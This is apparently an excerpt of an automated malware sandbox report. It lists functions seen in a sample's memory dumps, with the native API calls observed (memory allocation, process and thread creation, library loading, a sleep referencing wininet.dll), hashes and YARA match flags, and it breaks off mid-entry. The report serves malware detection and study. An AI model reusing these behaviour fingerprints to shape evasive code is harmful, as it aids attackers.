                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                            • Instruction ID: a16ca2bd744da44d0b015001616f551d0e5cb6c9d1dfcfe200fc8def388adb98
                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                            • Instruction Fuzzy Hash: B7F0A4B2200208AFCB14DF89DC85EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC87CA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AB2D11,00002000,00003000,00000004), ref: 00AC8809
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 764bd77962477d57291ca3809ad34b303e7b23d738b60c58afc3547f8011096f
                                                            • Instruction ID: 0ad08f37fdb72ab652737efc350258dcfb479e823c918b7aa29e8f61d8b9a571
                                                            • Opcode Fuzzy Hash: 764bd77962477d57291ca3809ad34b303e7b23d738b60c58afc3547f8011096f
                                                            • Instruction Fuzzy Hash: 16F01CB6210159AFDB14DF88CC85EAB77ADFF88354F158549FE5997241C630E811CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC87D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AB2D11,00002000,00003000,00000004), ref: 00AC8809
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                            • Instruction ID: 403af956867e4518848fd4b2d59f18532c5ac6b6e01fe474d2231a4bc1747548
                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                            • Instruction Fuzzy Hash: 84F015B2200208AFCB14DF89CC85EAB77ADAF88750F158248BE0897241C630F810CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC8720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(00AC3D60,?,?,00AC3D60,00000000,FFFFFFFF), ref: 00AC8745
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                            • Instruction ID: 8cb1b8178dc76cf59c62987c2da663277ec739993578adc5886f3cde9e819cea
                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                            • Instruction Fuzzy Hash: 43D01776200218ABD710EB98CC8AFA77BACEF48760F154599BA189B242C530FA0086E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 78a7366be1b6c9cd3e49bc5f63673776927f3aebb6e4c5d66fc10e553d4dec8e
                                                            • Instruction ID: 2609513c0a14c12497ebdb77c79d0baba534e7fcd5469dfb7d11fd4cd16e8650
                                                            • Opcode Fuzzy Hash: 78a7366be1b6c9cd3e49bc5f63673776927f3aebb6e4c5d66fc10e553d4dec8e
                                                            • Instruction Fuzzy Hash: 589002F520100402D54471594545746001597D0341F91C421A5094554E86998DD57AF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1237f5feea82adfe7546d374c1a9cdf6150ac119e23e156f735832c9edccb824
                                                            • Instruction ID: 0c83517f6c4ab81139625dc047afc3c8cf669f41fb43b22969e6e967250f06ef
                                                            • Opcode Fuzzy Hash: 1237f5feea82adfe7546d374c1a9cdf6150ac119e23e156f735832c9edccb824
                                                            • Instruction Fuzzy Hash: E49002A9211000030509A5590745507005697D5391391C431F1045550CD6618C6165B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 053899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9e5f8dc2d3f766afb0965b680cea2753f884965e438444fed788e70e1831528a
                                                            • Instruction ID: ec1c60e01788947cd9a7ff2c6723ffa39917f6682eb1c470d78b24a9fc7cf7e6
                                                            • Opcode Fuzzy Hash: 9e5f8dc2d3f766afb0965b680cea2753f884965e438444fed788e70e1831528a
                                                            • Instruction Fuzzy Hash: 989002E534100442D50461594555B060015D7E1341F91C425E1094554D8659CC5275B6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 053895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5c9e2cae9eaf919acae6cafed35eb0a25e91b9a69904002b328f096afc824b13
                                                            • Instruction ID: 6ded881091c4c7bd3ecec4f1ef0280f5ffc13093a85b7175a582a978961c48c3
                                                            • Opcode Fuzzy Hash: 5c9e2cae9eaf919acae6cafed35eb0a25e91b9a69904002b328f096afc824b13
                                                            • Instruction Fuzzy Hash: C99002E520200003450971594555616401A97E0241B91C431E1044590DC5658C9175B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f6b0ee429a7092af9fcbeff3d5ffa5408ac83061cfd0c4208c9a2abca1397fbf
                                                            • Instruction ID: 43416ab0dc2f17d4765f1e4ebbef4d2217678a0606d491d00de42d00cd7d775a
                                                            • Opcode Fuzzy Hash: f6b0ee429a7092af9fcbeff3d5ffa5408ac83061cfd0c4208c9a2abca1397fbf
                                                            • Instruction Fuzzy Hash: 0E9002B520100413D51561594645707001997D0281FD1C822A0454558D96968D52B5B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 63a3121947516df57770c810655db95a2628f72ff0aa618dedd4a1d8b6ed183c
                                                            • Instruction ID: d76031e8819fd5d66a2c191b3b62e58f1ba1cba371763fdd7e3bdc78bb4a2fd9
                                                            • Opcode Fuzzy Hash: 63a3121947516df57770c810655db95a2628f72ff0aa618dedd4a1d8b6ed183c
                                                            • Instruction Fuzzy Hash: 159002A5242041525949B15945455074016A7E02817D1C422A1444950C85669C56EAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 31ce94e41230b292c34b3f56ff9df919599615370bf56d4a3f3f9863b1712ba5
                                                            • Instruction ID: 5b2724fa9630ee97306aea7caf5cf9948dfb977a9c189dee0774b8a3b9a5eaf5
                                                            • Opcode Fuzzy Hash: 31ce94e41230b292c34b3f56ff9df919599615370bf56d4a3f3f9863b1712ba5
                                                            • Instruction Fuzzy Hash: 6E9002B520100402D50465995549646001597E0341F91D421A5054555EC6A58C9175B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c9c4c61a80f0499571f64534e3bba9086d6bfffee17025fde466507829f238e6
                                                            • Instruction ID: 444e5e3c5aa92114680be1841cb19f1c5dd3ab560dddc67b61f74be79d2e9b9c
                                                            • Opcode Fuzzy Hash: c9c4c61a80f0499571f64534e3bba9086d6bfffee17025fde466507829f238e6
                                                            • Instruction Fuzzy Hash: 5C9002AD21300002D5847159554960A001597D1242FD1D825A0045558CC9558C6967B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 49a17059567a6869d3d383186790f8d21f746b9919e65ccbacaa6224fdb063b2
                                                            • Instruction ID: d995e21164e42789cc5d5147a4046617222dfc3ef71e82f1eb7df1887b60dfd4
                                                            • Opcode Fuzzy Hash: 49a17059567a6869d3d383186790f8d21f746b9919e65ccbacaa6224fdb063b2
                                                            • Instruction Fuzzy Hash: 9F9002B531114402D51461598545706001597D1241F91C821A0854558D86D58C9175B2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 69f8e859af2ba532fce55e3e7da5830f559c5df00b567373741b257324a7e61f
                                                            • Instruction ID: 7afd17e4294816f16b9c5baade19b4be529684956f0cf8815aee395e86bd4ce0
                                                            • Opcode Fuzzy Hash: 69f8e859af2ba532fce55e3e7da5830f559c5df00b567373741b257324a7e61f
                                                            • Instruction Fuzzy Hash: B69002B520100802D5847159454564A001597D1341FD1C425A0055654DCA558E597BF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4bc34bff12052a078cb8433209ba5a66d735281e6114fce10c0ef79c2ca7b2c5
                                                            • Instruction ID: 52d6842997659320249c93c9b0bf0fc2577ad3196fa7f540a9bfd2adb69229e7
                                                            • Opcode Fuzzy Hash: 4bc34bff12052a078cb8433209ba5a66d735281e6114fce10c0ef79c2ca7b2c5
                                                            • Instruction Fuzzy Hash: E49002A521180042D60465694D55B07001597D0343F91C525A0184554CC9558C6169B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05389650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1940fa7fec344d070942ba77eee640d87e4b3493cfa4abeec3a7befba999cdfa
                                                            • Instruction ID: f431133fb802c98712debcab56a302d01adc09f90cad63ed562b5282b2e77b85
                                                            • Opcode Fuzzy Hash: 1940fa7fec344d070942ba77eee640d87e4b3493cfa4abeec3a7befba999cdfa
                                                            • Instruction Fuzzy Hash: BD9002B520504842D54471594545A46002597D0345F91C421A0094694D96658D55BAF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 053896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8fb0b6bc8162209ef8384b0d080a3548b99835d4c8c0cf4556e6696b3524dbe8
                                                            • Instruction ID: 4d0f2d3f66171145d7f0841193fb032b748efca8fe206d0e52e3882ed65b8ff1
                                                            • Opcode Fuzzy Hash: 8fb0b6bc8162209ef8384b0d080a3548b99835d4c8c0cf4556e6696b3524dbe8
                                                            • Instruction Fuzzy Hash: E79002B520108802D5146159854574A001597D0341F95C821A4454658D86D58C9175B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 053896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.617905723.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                                            • Associated: 0000000B.00000002.618351777.000000000543B000.00000040.00000001.sdmp Download File
                                                            • Associated: 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: cf6761a0be4de4215dfe1bf95abbcbe0aa51e684255c0b48bd5094b4f2c71a05
                                                            • Instruction ID: e594bdaf8afd185bef73adb6680141eaad6268777f651621b3d9fea689213c8b
                                                            • Opcode Fuzzy Hash: cf6761a0be4de4215dfe1bf95abbcbe0aa51e684255c0b48bd5094b4f2c71a05
                                                            • Instruction Fuzzy Hash: 1E9002B520100842D50461594545B46001597E0341F91C426A0154654D8655CC5179B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC7310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00AC73B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 18030ca8d8da0b7ae8e5c22a388e14898c9708079090d1e061764ef663e27864
                                                            • Instruction ID: e8545109d9e29879fcd6f79395217d7b3f7b15e0b88a82f145275da62e7bdf2f
                                                            • Opcode Fuzzy Hash: 18030ca8d8da0b7ae8e5c22a388e14898c9708079090d1e061764ef663e27864
                                                            • Instruction Fuzzy Hash: 9931A1B6606604ABD715DF64C8A1FABB7B8FF88700F04811DFA195B241D730B945CBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC730B, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00AC73B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 37c564236e5b7c9d7d1cb9d66c1c5c1eb880db7b8b110aa027a48082945433d7
                                                            • Instruction ID: d1dea5145403a9de2490b375c023c73eae0bc3cfdb040a5143a29ac4a448392f
                                                            • Opcode Fuzzy Hash: 37c564236e5b7c9d7d1cb9d66c1c5c1eb880db7b8b110aa027a48082945433d7
                                                            • Instruction Fuzzy Hash: 3721B1B5605604ABD710DF64C8A1FABBBB4FF48704F04811DFA1D5B241D770A955CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC88F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AB3B93), ref: 00AC892D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: .z`
                                                            • API String ID: 3298025750-1441809116
                                                            • Opcode ID: 0e05f82afda62833b6e2a9e3195558413027f4a0b09dc518a559e1c37d6a21b0
                                                            • Instruction ID: 0d4a20137ea0a20d82f939c5a063fdcc385a3f8ca338cd08281dc44e8f9a45db
                                                            • Opcode Fuzzy Hash: 0e05f82afda62833b6e2a9e3195558413027f4a0b09dc518a559e1c37d6a21b0
                                                            • Instruction Fuzzy Hash: 92F0BEB82082899FDB00EF689CC1CAB77A4BF843187128A5EEC4947643D630D51987A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC8900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AB3B93), ref: 00AC892D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: .z`
                                                            • API String ID: 3298025750-1441809116
                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                            • Instruction ID: 3091eefbfa3ad7566188947e40d274c0679391f9d487a35022f8ce596c8f3762
                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                            • Instruction Fuzzy Hash: 6FE04FB1200208AFD714DF59CC49EA777ACEF88750F014558FD0857242C630F910CAF0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AB7290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00AB72EA
                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00AB730B
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: a18ddeda0bb52dac821013b9bd9252989e64dc01161c556106a0c3a29986c39b
                                                            • Instruction ID: 4998d58c2f25d382f887bee308ead3fd4c1bd224efadc0c3940e41117a9c694e
                                                            • Opcode Fuzzy Hash: a18ddeda0bb52dac821013b9bd9252989e64dc01161c556106a0c3a29986c39b
                                                            • Instruction Fuzzy Hash: 2301A231A802287AEB21A6949D43FFF77AC9B41B51F054118FF04BA1C2E6D46A0647F6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AB9B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00AB9BC2
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                            • Instruction ID: 58ac0a77b889ba6e9e223b57fdb3ba93cd15d1c438f6d647076526b19e1bec60
                                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                            • Instruction Fuzzy Hash: D3011EB5D1020DABDB10DBE4ED46FDEB7BC9B54308F104199EA08A7242F671EB14CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC8970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AC89C4
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                            • Instruction ID: d851f598497ecc4bd91429dd4885c06983ee0c4d62efb576da258f9fb3849196
                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                            • Instruction Fuzzy Hash: 6301AFB2210108AFCB54DF89DC85EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC7440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00ABCD00,?,?), ref: 00AC747C
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                                            • Instruction ID: e550b5573cf603d862c8643d27d37d8669395062223ae6e36ac591ba3078e4c0
                                                            • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                                            • Instruction Fuzzy Hash: FFE092733803183AE73065AD9C03FE7B39CCB81B20F15002AFA0DEB2C1D595F80142A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC7433, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00ABCD00,?,?), ref: 00AC747C
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: a2c5fc05f77908fea2a82eaa2c1e9958a10f31720c3122e6b87bc566828049bd
                                                            • Instruction ID: cb66a5d34ef704b1c70b7ac7253ee6485c7e90e7b359e950fa7664dd4b938a74
                                                            • Opcode Fuzzy Hash: a2c5fc05f77908fea2a82eaa2c1e9958a10f31720c3122e6b87bc566828049bd
                                                            • Instruction Fuzzy Hash: C3F0E5323803043AE2216AAC8C02FA777E88BA1B10F150529F64DEB2C1C594B8054754
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC88C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00AC3546,?,00AC3CBF,00AC3CBF,?,00AC3546,?,?,?,?,?,00000000,00000000,?), ref: 00AC88ED
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                            • Instruction ID: 7157574ce8e426a1d65812a522f6982fce883c50f3a3eab8c7cda83c503496ea
